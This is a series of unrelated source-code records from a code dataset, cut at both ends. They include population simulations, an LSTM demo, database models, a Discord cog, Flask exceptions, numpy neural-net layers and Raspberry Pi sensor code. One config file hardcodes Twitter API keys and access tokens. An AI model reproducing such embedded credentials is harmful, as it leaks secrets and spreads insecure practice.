as sns\nrc = {'lines.linewidth': 4, 'axes.labelsize': 25,\n 'axes.titlesize': 30, 'lines.markersize': 20,\n 'legend.fontsize': 16}\nsns.set(rc=rc)\n\n# Define functions for dr/dt and df/dt\n\ndef dr_dt(r, f, alpha=1, beta=0.2):\n \"\"\"Compute dr/dt, time derivative of rabbit population\"\"\"\n\n return alpha * r - beta * f * r\n\ndef df_dt(r, f, delta=0.3, gamma=0.8):\n \"\"\"Compute df/dt, time derivative of fox population\"\"\"\n\n return delta * f * r - gamma * f\n\n# Define time range to numerically integrate over\ndelta_t = 0.001\nt_range = np.arange(0, 60, delta_t)\n\n# Initialize arrays to store rabbit and fox populations\nr = np.zeros_like(t_range)\nf = np.zeros_like(t_range)\n\n# Set initial conditions (at time t=0)\nr[0] = 10 # rabbits\nf[0] = 1 # fox\n\n# Numerically integrate\nfor i in range(1, len(t_range)):\n delta_r = dr_dt(r[i-1], f[i-1]) * delta_t\n delta_f = df_dt(r[i-1], f[i-1]) * delta_t\n\n r[i] = r[i-1] + delta_r\n f[i] = f[i-1] + delta_f\n\n# Plot results\n_ = plt.plot(t_range, r, '.r')\n_ = plt.plot(t_range, f, '.b')\n\n# Axes and title\nplt.title('Lotka-Volterra Model')\nplt.xlabel('Time')\nplt.ylabel('# of animals')\n\n# Legend\nplt.legend(('Rabbits (prey)', 'Foxes 
(predator)'))\nplt.show()\n","sub_path":"e03-03.py","file_name":"e03-03.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"439506868","text":"import torch as t\nimport torchvision as tv\nimport torchvision.transforms as transforms\nimport torch.nn as nn\nimport torch.optim as optim\nimport argparse\nimport math\nimport csv\nimport numpy as np\nimport pandas as pd\nfrom PIL import Image\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\nfrom torchsummary import summary\n\n'''\n1.通过输入sin值去预测cos\n'''\n\n# Hyper Parameters\nTIME_STEP = 10 # rnn time step\nINPUT_SIZE = 1 # rnn input size\nLR = 0.02 # learning rate\n\n\n\nclass MyRNN(nn.Module):\n def __init__(self, input_size, hidden_size, output_size):\n super(MyRNN, self).__init__()\n self.rnn = nn.LSTM(\n input_size = input_size,\n hidden_size = hidden_size,\n batch_first = True\n )\n self.out = nn.Linear(hidden_size, output_size)\n\n self.rnn_type = \"LSTM\"\n self._hidden_size = hidden_size\n self._layer = 1\n '''\n :param x: batch,seq_len,input_size: 1,10,1\n :param h_state: batch, h_size\n :return:\n 因为本函数做作的是的,输入con_y来模拟sin_y,所以每个input的prediction都要\n 作为损失的依据。\n '''\n def forward(self, x, h_state):\n #output: batch, seq_len,direction * h_size: 1,10,32\n #h_state[0]:batch,layer*direction, h_size : 1,1,32\n\n output,h_state = self.rnn(x, h_state)\n\n out = self.out(t.squeeze(output))\n return out,h_state\n\n def init_hidden(self, batch, requires_grad=True):\n weight = next(self.parameters())\n if self.rnn_type == 'LSTM':\n return (t.zeros((batch, self._layer, self._hidden_size), requires_grad=requires_grad),\n t.zeros((batch, self._layer, self._hidden_size), requires_grad=requires_grad))\n else:\n return t.zeros((batch, self._layer, self._hidden_size), requires_grad=requires_grad)\n\n\ndef repackage_hidden(h):\n if isinstance(h, t.Tensor):\n return h.detach()\n else:\n return tuple(repackage_hidden(v) for v in h)\n\n\nif __name__ == '__main__':\n input_size = 1\n hidden_size = 32\n output_size = 1\n\n rnn = MyRNN(input_size, hidden_size, output_size)\n optimizer = optim.Adam(rnn.parameters(), lr=LR)\n loss_func = nn.MSELoss()\n\n for item in rnn.parameters():\n print(item.shape)\n\n\n\n h_state = t.zeros(1,1,32)\n\n predict_list = []\n y_list = []\n steps_list = []\n\n h_state = rnn.init_hidden(1)\n\n for step in range(60):\n start, end = step * np.pi, (step + 1) * np.pi\n steps = np.linspace(start, end, TIME_STEP, dtype=np.float32)\n x_np = np.sin(steps)\n y_np = np.cos(steps)\n\n x = t.Tensor(t.from_numpy(x_np[np.newaxis, :, np.newaxis]))\n y = t.Tensor(t.from_numpy(y_np[np.newaxis, :, np.newaxis]))\n\n\n #x shape batch,seq_len,dim : 1,10,1\n h_state = repackage_hidden(h_state)\n predict, h_n = rnn(x, h_state)\n #h_state = repackage_hidden(h_state)\n loss = loss_func(predict, y)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n steps_list.extend(steps.tolist())\n predict_list.extend(predict.data.numpy().flatten())\n y_list.extend(y_np.flatten())\n\n plt.plot(steps_list, y_list, 'r-')\n plt.plot(steps_list, predict_list, 'b-')\n plt.draw()\n plt.show()\n","sub_path":"com/study/dl/rnn/lstm_sin_cos.py","file_name":"lstm_sin_cos.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"397895230","text":"from sqlalchemy import Column, BigInteger, Integer, String,\\\n DateTime, ForeignKey, Table\nfrom models import 
Base\n\n\nwxusers = Table('wx_users', Base.metadata,\n Column('id', BigInteger, primary_key=True, comment='ID'),\n Column('openid', String(64), nullable=False, comment='OpenID'),\n Column('unionid', String(64), comment='UnionID'),\n Column('nickname', String(64), comment='昵称'),\n Column('name', String(32), comment='名称'),\n Column('sex', Integer, default=0, comment='性别'),\n Column('language', String(32), comment='语言'),\n Column('city', String(64), comment='城市'),\n Column('province', String(64), comment='省份'),\n Column('country', String(64), comment='国家'),\n Column('headimgurl', String(512), comment='头像'),\n Column('remark', String(512), comment='备注'),\n Column('phone', String(32), comment='电话'),\n Column('mobile', String(32), comment='手机'),\n Column('email', String(256), comment='E-Mail'),\n Column('tags', String(256), comment='标签'),\n Column('subscribe', Integer, default=0, comment='关注状态'),\n Column('subscribe_time', BigInteger, comment='关注时间'),\n Column('subscribe_scene', String(32), comment='关注场景'),\n Column('qr_scene', Integer, comment='OpenID'),\n Column('qr_scene_str', String(256), comment='OpenID'),\n # Column('group_id', None, ForeignKey(\n # 'wx_user_groups.id', ondelete=\"set null\")),\n Column('account_id', None, ForeignKey(\n 'wx_accounts.id', ondelete=\"set null\"), comment='微信公众号'),\n Column('created_date', DateTime,\n nullable=False, comment='创建时间'),\n Column('last_modifed', DateTime, comment='修改时间')\n )\n","sub_path":"plugins/weixin/models/wxuser.py","file_name":"wxuser.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"89243820","text":"from discord import Game\n\nfrom cogs.utils.custom_bot import CustomBot\n\n\nclass ConnectionEvent(object):\n\n def __init__(self, bot:CustomBot):\n self.bot = bot \n\n\n @property\n def event_log_channel(self):\n channel_id = self.bot.config['event_log_channel']\n channel = self.bot.get_channel(channel_id)\n return channel\n\n\n # async def on_connect(self):\n # await self.event_log_channel.send(\"`on_connect` called.\")\n\n\n # async def on_ready(self):\n # await self.event_log_channel.send(\"`on_ready` called.\")\n\n\n async def on_shard_ready(self, shard_id:int):\n await self.event_log_channel.send(f\"`on_shard_ready` called for shard ID `{shard_id}`.\")\n presence_text = self.bot.config['presence_text']\n game = Game(f\"{presence_text} (shard {shard_id})\")\n await self.bot.change_presence(activity=game, shard_id=shard_id)\n\n\ndef setup(bot:CustomBot):\n x = ConnectionEvent(bot)\n bot.add_cog(x)\n","sub_path":"cogs/connection_event.py","file_name":"connection_event.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"469687459","text":"from yolobel import enums\r\nimport cv2\r\ndef yolo_calculator(point1,point2,w,h,rectangle):\r\n centre = [0.5*(point1[1]+point2[1])/w, 0.5*(point1[0]+point2[0])/h]\r\n width, height = (rectangle[3]/w, rectangle[2]/h)\r\n yolo_result = (f'{centre[0]:.6f} {centre[1]:.6f} {width:.6f} {height:.6f}\\n')\r\n return yolo_result\r\n\r\ndef save_out(yolo_result,frame):\r\n\r\n cv2.imwrite(enums.out_directory +\"/{}{}.jpg\".format(enums.out_name,enums.out_count),frame)\r\n out_text = open(enums.out_directory+\"/{}{}.txt\".format(enums.out_name,enums.out_count), \"w\")\r\n out_text.write(yolo_result)\r\n out_text.close()\r\n if(enums.out_count == 0):\r\n classes_text = open(enums.out_directory+\"/classes.txt\", \"w\")\r\n 
classes_text.write(str(enums.out_name))\r\n classes_text.close()\r\n\r\n\r\n\r\n enums.out_count +=1\r\n\r\n","sub_path":"Yolobel/vidbox.py","file_name":"vidbox.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"281959415","text":"from werkzeug._compat import integer_types\nfrom werkzeug.exceptions import Aborter, HTTPException\n\n\nclass RateLimit(Exception):\n def __init__(self, response):\n self.response = response\n try:\n message = response.json()[\"message\"]\n except Exception:\n message = getattr(response, \"content\", response)\n super().__init__(message)\n\n\nclass Rollback(Exception):\n \"\"\"Raising to manually rollback current (nested) transaction.\n\n Raising a ``Rollback`` will always rollback the current most recent\n transaction. By default (not setting `propagate`), subtransaction-driven\n (`nested=False`) nested transaction will rollback and re-raise the same\n ``Rollback`` exception object, while savepoint-driven (`nested=True`)\n nested transaction will rollback and stop the exception from propagating.\n\n You can manually override the behavior by setting `propagate` to `True`\n (always re-raise) or `False` (always swallow the exception) on need.\n Caution, setting to `False` can be sometimes dangerous, because it may be\n misleading when the code runs successfully without any errors but code\n after `raise Rollback(propagate=False)` is never executed, and the data is\n not persisted at all, silently. It is the same situation to use\n `raise Rollback()` in a savepoint-driven nested transaction (root\n transaction is never affected, unless explicitly set `propagate` to\n `False`, the exception is always re-raised.)\n \"\"\"\n\n def __init__(self, propagate=None):\n self.propagate = propagate\n\n\nclass Ejecter(Aborter):\n def __call__(self, code, *args, **kwargs):\n if not args and not kwargs and not isinstance(code, integer_types):\n raise HTTPException(response=code)\n if code not in self.mapping:\n raise LookupError(\"no exception for %r\" % code)\n return self.mapping[code](*args, **kwargs)\n\n\ndef eject(status, *args, **kwargs):\n \"\"\"\n A version of werkzeug.exceptions.abort that puts the description\n in the response status code to help PyPI.\n \"\"\"\n ejection = _ejecter(status, *args, **kwargs)\n description = kwargs.get(\"description\")\n if description is not None:\n ejection.code = \"%s %s\" % (ejection.code, description)\n raise ejection\n\n\n_ejecter = Ejecter()\n","sub_path":"jazzband/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"121590136","text":"import os\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\nSQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'app.db')\nSQLALCHEMY_MIGRATE_REPO = os.path.join(basedir, 'db_repository')\n\n# Neo4j database address\nNEO4J_DB_ADDR = \"http://localhost:7474/db/data/\" \n\n#twitter feed parameters\nCONSUMER_KEY = 'gak4XDTmSROJ0Maa8DGDt8CJT'\nCONSUMER_SECRET = 'f4UVy2riwK3iu1Nzl7Jgfm3WfFe3GC1DkFF5Oxe5A0o0g57GL4'\nACCESS_TOKEN_KEY = '725519940-CHo44i7SuseSHiUkUGd8lLNbGs6o4VcmAwQo1cS5'\nACCESS_TOKEN_SECRET = 'uVwmTpMTbD3IRILhfsznXMoYdrjWLH0PpFKznLmVbUKWR'\n\n# locale as 'en_US'\nLOCALE_VALUE = 
'en_US'","sub_path":"server/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"618613711","text":"from Constract.IPull import IPull\nimport asyncio\nfrom HcServices.Http import Http\nfrom Helper.System import System\nimport logging\nfrom Database.Db import Db\nimport Constant.Constant as const\n\n\nclass GroupingPullHandler(IPull):\n\n    def __init__(self, log: logging.Logger, http: Http):\n        super().__init__(log, http)\n\n    async def PullAndSave(self):\n        s = System(self._IPull__logger)\n        data = await s.SendHttpRequestTotUrl(self._IPull__http, const.SERVER_HOST+const.CLOUD_PULL_GROUPING_URL, {})\n        if data is not None:\n            self.__saveToDb(data)\n            self.PullSuccess()\n\n    def __saveToDb(self, data: list):\n        db = Db()\n        db.Services.GroupingServices.AddManyGroupingWithCustomData(data)\n\n        deviceIdForGroupDeviceMapping = []\n        groupDeviceMappingArray = []\n\n        for i in range(len(data)):\n            groupingDeviceMappingsList = data[i].get(\"groupingDeviceMappings\", [])\n            for j in range(len(groupingDeviceMappingsList)):\n                deviceId = groupingDeviceMappingsList[j].get('deviceId')\n                groupingObject = {\n                    \"GroupingId\": groupingDeviceMappingsList[j].get('groupingId'),\n                    \"GroupUnicastId\": data[i].get('unicastId'),  # unicast id belongs to the outer group record (data[i], not data[j])\n                    \"DeviceId\": groupingDeviceMappingsList[j].get('deviceId'),\n                    \"DeviceUnicastId\": None\n                }\n                deviceIdForGroupDeviceMapping.append(deviceId)\n                groupDeviceMappingArray.append(groupingObject)\n\n        deviceRecords = db.Services.DeviceServices.FindAllDevice()\n        deviceIdUnicastMapping = {}\n\n        for deviceRecord in deviceRecords:\n            deviceId = deviceRecord['DeviceId']\n            deviceUnicastId = deviceRecord['DeviceUnicastId']\n            deviceIdUnicastMapping[deviceId] = deviceUnicastId\n\n        for i in range(len(deviceIdForGroupDeviceMapping)):\n            deviceId = deviceIdForGroupDeviceMapping[i]\n            groupDeviceMappingArray[i]['DeviceUnicastId'] = deviceIdUnicastMapping.get(deviceId)\n        db.Services.GroupingDeviceMappingServices.AddManyGroupingDeviceMappingWithCustomData(groupDeviceMappingArray)\n","sub_path":"PullHandler/GroupingPullHandler.py","file_name":"GroupingPullHandler.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"281696464","text":"import os\nimport sys\n\nimport main\nimport main_iterative\nimport main_iterative_all_videos\n\nif __name__ == \"__main__\":\n    video_path = \"\"\n    if len(sys.argv) > 1:\n        video_path = sys.argv[1]\n        if not os.path.exists(video_path):\n            print(\"Missing file video: video path is not correct\")\n            exit(0)\n        if len(sys.argv) == 2:\n            main_iterative.run(video_path)\n        else:\n            # minimum duration threshold of a fixation (frames)\n            duration_threshold = int(sys.argv[2])\n            # maximum dispersion threshold of a fixation (pixels)\n            dispersion_threshold = int(sys.argv[3])\n            main.run(video_path, duration_threshold, dispersion_threshold)\n    else:\n        main_iterative_all_videos.run()\n\n\n\n","sub_path":"INMCA_Leporini.py","file_name":"INMCA_Leporini.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"502844178","text":"from libcloud.storage.types import Provider\nfrom libcloud.storage.providers import get_driver\n\nFILE_PATH = \"/home/user/myfile.tar.gz\"\n\ncls = get_driver(Provider.S3)\ndriver = cls(\"api key\", \"api secret key\")\n\ncontainer = 
driver.get_container(container_name=\"my-backups-12345\")\n\n# This method blocks until all the parts have been uploaded.\nextra = {\"content_type\": \"application/octet-stream\", \"acl\": \"public-read\"}\n\nwith open(FILE_PATH, \"rb\") as iterator:\n obj = driver.upload_object_via_stream(\n iterator=iterator, container=container, object_name=\"backup.tar.gz\", extra=extra\n )\n","sub_path":"docs/examples/storage/s3/upload_object_acls.py","file_name":"upload_object_acls.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"220018341","text":"#!/usr/bin/python3\n\nimport jnius_config\nimport sys\n\njnius_config.set_classpath('terra121_classes')\nfrom jnius import autoclass\n\nA = 6378137.0\nB = 6356752.3142\n\nModifiedAirocean = autoclass(\"io.github.terra121.projection.ModifiedAirocean\")\nScaleProjection = autoclass(\"io.github.terra121.projection.ScaleProjection\")\nGeographicProjection = autoclass(\"io.github.terra121.projection.GeographicProjection\")\nOrientation = autoclass(\"io.github.terra121.projection.GeographicProjection$Orientation\")\n\nbase_projection = GeographicProjection.orientProjection(ModifiedAirocean(), Orientation.none)\nprojection = ScaleProjection(base_projection, 7318261.522857145, -7318261.522857145)\n\nif __name__ == \"__main__\":\n# print(projection.fromGeo(0, 51.5))\n# print(projection.toGeo(*projection.fromGeo(0, 51.5)))\n\n# print(projection.fromGeo(47.58562, 6.89743))\n# print('Number of arguments:', len(sys.argv), 'arguments.')\n# print('Argument List:', str(sys.argv))\n\n# print('Argument List:', str(sys.argv[0]))\n print(projection.fromGeo( float(str(sys.argv[2])) , float(str(sys.argv[1]))) )","sub_path":"PACMAN_CUBERITE/project-obj/projection.py","file_name":"projection.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"311096503","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nfrom layers import *\nfrom fast_layers import *\n\n\nconv_forward = conv_forward_fast\nconv_backward = conv_backward_fast\n\navg_pool_forward = avg_pool_forward_fast\navg_pool_backward = avg_pool_backward_fast\nmax_pool_forward = max_pool_forward_fast\nmax_pool_backward = max_pool_backward_fast\n\n\ndef spatial_reflection_padding(array, pad_width, pad_type='even'):\n '''https://twitter.com/karpathy/status/720622989289644033'''\n return np.pad(array, pad_width, 'reflect', pad_type)\n\n\ndef spatial_replication_padding(array, pad_width):\n '''https://twitter.com/karpathy/status/720622989289644033'''\n return np.pad(array, pad_width, 'edge')\n\n\ndef skip_forward(x, n_out_channels):\n '''\n Computes the forward pass for a skip connection.\n The input x has shape (N, d_1, d_2, d_3) where x[i] is the ith input.\n If n_out_channels is equal to 2* d_1, downsampling and padding are applied\n else, the input is replicated in output\n Inputs:\n x - Input data, of shape (N, d_1, d_2, d_3)\n n_out_channels - Number of channels in output\n Returns a tuple of:\n - skip: output, of shape (N, n_out_channels, d_2/2, d_3/2)\n - cache: (pool_cache, downsampled, skip_p)\n '''\n N, n_in_channels, H, W = x.shape\n assert (n_in_channels == n_out_channels) or (\n n_out_channels == n_in_channels*2), 'Invalid n_out_channels'\n skip = np.array(x, copy=True)\n pool_cache, downsampled, skip_p = None, False, 0\n\n if n_out_channels > n_in_channels:\n # downsampling\n pool_param = 
{'pool_width': 2, 'pool_height': 2, 'stride': 2}\n\n skip, pool_cache = avg_pool_forward(skip, pool_param)\n # padding\n p = skip_p = (n_in_channels)/2\n skip = np.pad(skip, ((0, 0), (p, p), (0, 0), (0, 0)),\n mode='constant')\n\n downsampled = True\n\n return skip, (pool_cache, downsampled, skip_p)\n\n\ndef skip_backward(dout, cache):\n '''\n Computes the backward pass for a skip connection.\n The input x has shape (N, d_1, d_2, d_3) where x[i] is the ith input.\n If n_out_channels was equal to 2* d_1, we back-apply downsampling and padding,\n else, the input is replicated in output\n Returns:\n - dskip: Gradient with respect to x, of shape (N, d1, ..., d_k)\n '''\n pool_cache, downsampled, skip_p = cache\n dskip = np.array(dout, copy=True)\n if downsampled:\n # back pad\n dskip = dskip[:, skip_p:-skip_p, :, :]\n # back downsampling\n\n dskip = avg_pool_backward(dskip, pool_cache)\n return dskip\n\n\ndef affine_relu_forward(x, w, b):\n '''\n Convenience layer that perorms an affine transform followed by a ReLU\n\n Inputs:\n - x: Input to the affine layer\n - w, b: Weights for the affine layer\n\n Returns a tuple of:\n - out: Output from the ReLU\n - cache: Object to give to the backward pass\n '''\n a, fc_cache = affine_forward(x, w, b)\n out, relu_cache = relu_forward(a)\n cache = (fc_cache, relu_cache)\n return out, cache\n\n\ndef affine_relu_backward(dout, cache):\n '''\n Backward pass for the affine-relu convenience layer\n '''\n fc_cache, relu_cache = cache\n da = relu_backward(dout, relu_cache)\n dx, dw, db = affine_backward(da, fc_cache)\n return dx, dw, db\n\n\ndef affine_bn_relu_forward(x, w, b, gamma, beta, bn_param):\n '''\n Convenience layer that performs an affine transform followed by batch\n normalization, followed by a ReLU.\n Inputs:\n - x: Input to the affine layer\n - w, b: Weights for the affine layer\n - gamma, beta : Weight for the batch norm regularization\n - bn_params : Contain variable use to batch norml, running_mean and var\n\n Returns a tuple of:\n - out: Output from the ReLU\n - cache: Object to give to the backward pass\n '''\n\n h, h_cache = affine_forward(x, w, b)\n hnorm, hnorm_cache = batchnorm_forward(h, gamma, beta, bn_param)\n hnormrelu, relu_cache = relu_forward(hnorm)\n cache = (h_cache, hnorm_cache, relu_cache)\n\n return hnormrelu, cache\n\n\ndef affine_bn_relu_backward(dout, cache):\n '''\n Backward pass for the affine-relu convenience layer\n '''\n h_cache, hnorm_cache, relu_cache = cache\n\n dhnormrelu = relu_backward(dout, relu_cache)\n dhnorm, dgamma, dbeta = batchnorm_backward(dhnormrelu, hnorm_cache)\n dx, dw, db = affine_backward(dhnorm, h_cache)\n\n return dx, dw, db, dgamma, dbeta\n\n\ndef conv_relu_forward(x, w, b, conv_param):\n '''\n A convenience layer that performs a convolution followed by a ReLU.\n\n Inputs:\n - x: Input to the convolutional layer\n - w, b, conv_param: Weights and parameters for the convolutional layer\n\n Returns a tuple of:\n - out: Output from the ReLU\n - cache: Object to give to the backward pass\n '''\n a, conv_cache = conv_forward_fast(x, w, b, conv_param)\n out, relu_cache = relu_forward(a)\n cache = (conv_cache, relu_cache)\n return out, cache\n\n\ndef conv_relu_backward(dout, cache):\n '''\n Backward pass for the conv-relu convenience layer.\n '''\n conv_cache, relu_cache = cache\n da = relu_backward(dout, relu_cache)\n dx, dw, db = conv_backward_fast(da, conv_cache)\n return dx, dw, db\n\n\ndef conv_relu_pool_forward(x, w, b, conv_param, pool_param):\n '''\n Convenience layer that performs a 
convolution, a ReLU, and a pool.\n\n    Inputs:\n    - x: Input to the convolutional layer\n    - w, b, conv_param: Weights and parameters for the convolutional layer\n    - pool_param: Parameters for the pooling layer\n\n    Returns a tuple of:\n    - out: Output from the pooling layer\n    - cache: Object to give to the backward pass\n    '''\n    a, conv_cache = conv_forward_fast(x, w, b, conv_param)\n    s, relu_cache = relu_forward(a)\n    out, pool_cache = max_pool_forward(s, pool_param)\n    cache = (conv_cache, relu_cache, pool_cache)\n    return out, cache\n\n\ndef conv_relu_pool_backward(dout, cache):\n    '''\n    Backward pass for the conv-relu-pool convenience layer\n    '''\n    conv_cache, relu_cache, pool_cache = cache\n    ds = max_pool_backward(dout, pool_cache)\n    da = relu_backward(ds, relu_cache)\n    dx, dw, db = conv_backward_fast(da, conv_cache)\n    return dx, dw, db\n\n\ndef conv_bn_relu_forward(x, w, b, conv_param, gamma, beta, bn_param):\n    '''\n    A convenience layer that performs a convolution followed by a batch\n    normalization, followed by a ReLU.\n\n    Inputs:\n    - x: Input to the convolutional layer\n    - w, b, conv_param: Weights and parameters for the convolutional layer\n    - gamma, beta, bn_param: Weights and parameters for the batch normalization\n      layer\n\n    Returns a tuple of:\n    - out: Output from the ReLU\n    - cache: Object to give to the backward pass\n    '''\n    out, conv_cache = conv_forward_fast(x, w, b, conv_param)\n    out, batchnorm_cache = spatial_batchnorm_forward(\n        out, gamma, beta, bn_param)\n    out, relu_cache = relu_forward(out)\n    cache = (conv_cache, batchnorm_cache, relu_cache)\n    return out, cache\n\n\ndef conv_bn_relu_backward(dout, cache):\n    '''\n    Backward pass for the conv-batchnorm-relu convenience layer.\n    '''\n    conv_cache, batchnorm_cache, relu_cache = cache\n    dout = relu_backward(dout, relu_cache)\n    dout, dgamma, dbeta = spatial_batchnorm_backward(dout, batchnorm_cache)\n    dx, dw, db = conv_backward_fast(dout, conv_cache)\n\n    return dx, dw, db, dgamma, dbeta\n\n\ndef bn_relu_conv_forward(x, w, b, conv_param, gamma, beta, bn_param, res=None):\n    '''\n    A convenience layer that performs a batch normalization followed by a\n    ReLU, followed by a convolution (pre-activation ordering).\n\n    Inputs:\n    - x: Input to the batch normalization layer\n    - w, b, conv_param: Weights and parameters for the convolutional layer\n    - gamma, beta, bn_param: Weights and parameters for the batch normalization\n      layer\n    - res: residual path to add after the convolution\n\n    Returns a tuple of:\n    - out: Output from the convolution (plus the residual, if given)\n    - cache: Object to give to the backward pass\n    '''\n    out, batchnorm_cache = spatial_batchnorm_forward(\n        x, gamma, beta, bn_param)\n    out, relu_cache = relu_forward(out)\n    out, conv_cache = conv_forward_fast(out, w, b, conv_param)\n\n    if res is not None:\n        out += res\n\n    cache = (conv_cache, batchnorm_cache, relu_cache)\n    return out, cache\n\n\ndef bn_relu_conv_backward(dout, cache, dres_ref=None):\n    '''\n    Backward pass for the bn-relu-conv convenience layer.\n    '''\n    assert dres_ref is None or len(dres_ref) == 0\n    conv_cache, batchnorm_cache, relu_cache = cache\n    if dres_ref is not None:\n        dres_ref.append(dout)\n\n    # chain the gradients: conv backward feeds relu backward, which feeds bn backward\n    dout, dw, db = conv_backward_fast(dout, conv_cache)\n    dout = relu_backward(dout, relu_cache)\n    dx, dgamma, dbeta = spatial_batchnorm_backward(dout, batchnorm_cache)\n\n    return dx, dw, db, dgamma, dbeta\n\n\ndef conv_bn_relu_pool_forward(x, w, b, conv_param, gamma, beta, bn_param, pool_param):\n    '''\n    A convenience layer that performs a convolution followed by a batch\n    normalization, followed by a 
ReLU, followed by a pooling layer.\n\n    Inputs:\n    - x: Input to the convolutional layer\n    - w, b, conv_param: Weights and parameters for the convolutional layer\n    - pool_param: parameters for the pooling layer\n    - gamma, beta, bn_param: Weights and parameters for the batch normalization\n      layer\n\n    Returns a tuple of:\n    - out: Output from the pool\n    - cache: Object to give to the backward pass\n    '''\n    out, conv_cache = conv_forward_fast(x, w, b, conv_param)\n    out, batchnorm_cache = spatial_batchnorm_forward(\n        out, gamma, beta, bn_param)\n    out, relu_cache = relu_forward(out)\n    out, maxpool_cache = max_pool_forward(out, pool_param)\n\n    cache = (conv_cache, batchnorm_cache, relu_cache, maxpool_cache)\n    return out, cache\n\n\ndef conv_bn_relu_pool_backward(dout, cache):\n    '''\n    Backward pass for the conv-batchnorm-relu-pool convenience layer.\n    '''\n    conv_cache, batchnorm_cache, relu_cache, maxpool_cache = cache\n    dout = max_pool_backward(dout, maxpool_cache)\n\n    dout = relu_backward(dout, relu_cache)\n    dout, dgamma, dbeta = spatial_batchnorm_backward(dout, batchnorm_cache)\n    dx, dw, db = conv_backward_fast(dout, conv_cache)\n\n    return dx, dw, db, dgamma, dbeta\n","sub_path":"pyfunt/layers/layer_utils.py","file_name":"layer_utils.py","file_ext":"py","file_size_in_byte":10253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"167762503","text":"# package imports\nimport RPi.GPIO as GPIO\nimport time\nimport os\n\n# pin numbers of the line-tracer sensors mounted on the underside\n#TrackSensorLeftPin1 TrackSensorLeftPin2 TrackSensorRightPin1 TrackSensorRightPin2\n#        3                   5                    4                   18\nTrackSensorLeftPin1 = 3\nTrackSensorLeftPin2 = 5\nTrackSensorRightPin1 = 4\nTrackSensorRightPin2 = 18\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\n\ndef lineinit():\n    GPIO.setup(TrackSensorLeftPin1,GPIO.IN)\n    GPIO.setup(TrackSensorLeftPin2,GPIO.IN)\n    GPIO.setup(TrackSensorRightPin1,GPIO.IN)\n    GPIO.setup(TrackSensorRightPin2,GPIO.IN)\n\ntry:\n    lineinit()\n    while True:\n        # when a sensor detects the line (black lines only), the matching indicator on the module lights up and 0 (Low, False) is returned\n        TrackSensorLeftValue1 = GPIO.input(TrackSensorLeftPin1)\n        TrackSensorLeftValue2 = GPIO.input(TrackSensorLeftPin2)\n        TrackSensorRightValue1 = GPIO.input(TrackSensorRightPin1)\n        TrackSensorRightValue2 = GPIO.input(TrackSensorRightPin2)\n\n        os.system(\"clear\")\n        print(\"왼쪽 1번 센서 : {0}\".format(TrackSensorLeftValue1))\n        print(\"왼쪽 2번 센서 : {0}\".format(TrackSensorLeftValue2))\n        print(\"오른쪽 1번 센서 : {0}\".format(TrackSensorRightValue1))\n        print(\"오른쪽 2번 센서 : {0}\".format(TrackSensorRightValue2))\nexcept KeyboardInterrupt:\n    pass\nGPIO.cleanup()\n\n","sub_path":"linetracer.py","file_name":"linetracer.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"567002595","text":"import trio\nimport os\nimport io\nfrom typing import Coroutine, Callable\nfrom eth2spec.phase0.spec import BeaconState\n# BeaconBlock is needed below when constructing response blocks\nfrom fastspec import SignedBeaconBlock, BeaconBlock, Container, Bytes32, uint64, Bytes4, List, GENESIS_FORK_VERSION\nfrom pyrum import Rumor\n\n\n# Before importing spec, load config:\n# from eth2spec.config.config_util import prepare_config\n# prepare_config(\"./some-dir\", \"config-name\")\n\n\nclass Status(Container):\n    version: Bytes4\n    finalized_root: Bytes32\n    finalized_epoch: uint64\n    head_root: Bytes32\n    head_slot: uint64\n\n\nclass Goodbye(uint64):\n    pass\n\n\nclass BlocksByRange(Container):\n    head_block_root: Bytes32\n    start_slot: uint64\n    count: uint64\n    step: uint64\n\n\nclass BlocksByRoot(List[Bytes32, 1024]):\n    
